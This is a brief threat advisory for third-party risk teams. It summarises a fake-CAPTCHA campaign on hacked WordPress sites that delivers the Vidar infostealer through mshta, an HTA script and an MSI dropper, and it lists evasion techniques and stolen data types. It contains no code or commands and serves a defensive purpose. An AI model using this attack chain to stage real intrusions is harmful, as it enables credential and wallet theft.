Fake CAPTCHA Campaign on Compromised WordPress Sites Delivers Vidar Infostealer to Windows Users
What Happened — Researchers observed a multi‑stage campaign that compromises WordPress sites, injects a fake Cloudflare‑style CAPTCHA page, and tricks visitors into executing a malicious mshta command. The command launches an obfuscated HTA script that drops a malicious MSI installer, which installs the Vidar infostealer on Windows machines.
Why It Matters for TPRM —
- The attack leverages legitimate Windows binaries, making detection difficult for standard endpoint controls.
- Vidar harvests browser credentials, crypto wallets, payment data, and other sensitive files, exposing third‑party data stored on employee workstations.
- Compromised vendor‑hosted web properties can become a delivery vector for downstream partners and customers.
Who Is Affected —
- All industries that rely on WordPress‑based web properties (media, e‑commerce, professional services, etc.).
- Organizations whose employees browse the internet from corporate devices without strict web‑filtering.
Recommended Actions —
- Review any third‑party WordPress sites or SaaS portals used by your organization for signs of compromise.
- Enforce strict execution policies that block
mshtaand unsigned MSI installers from internet sources. - Deploy behavior‑based endpoint detection and response (EDR) to flag hidden window manipulation and rapid MSI drops.
Technical Notes —
- Attack vector: Social engineering via fake CAPTCHA (phishing) →
mshta→ HTA script → MSI dropper → Vidar infostealer. - Key techniques: Use of legitimate Windows binaries (
mshta), off‑screen window resizing, XOR‑encoded strings, AV‑evasion checks via WMI, and size‑validation of the MSI (>100 KB). - Data collected: Browser passwords, crypto wallet seeds, session cookies, autofill/payment info, and arbitrary files.
- Observed geography of compromised sites: Italy, France, United States, United Kingdom, Brazil.
Source: Malwarebytes Labs – Hacked sites deliver Vidar infostealer to Windows users